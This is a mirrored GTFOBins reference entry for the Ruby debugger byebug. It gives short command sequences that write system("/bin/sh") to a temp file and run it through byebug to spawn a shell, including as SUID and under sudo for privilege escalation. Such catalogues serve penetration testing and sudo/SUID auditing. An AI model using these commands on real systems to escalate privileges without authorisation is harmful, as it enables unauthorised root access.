1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/byebug.md
2020-03-17 20:12:46 +01:00

389 B

functions
shell limited-suid sudo
code
TF=$(mktemp) echo 'system("/bin/sh")' > $TF byebug $TF continue
code
TF=$(mktemp) echo 'system("/bin/sh")' > $TF ./byebug $TF continue
code
TF=$(mktemp) echo 'system("/bin/sh")' > $TF sudo byebug $TF continue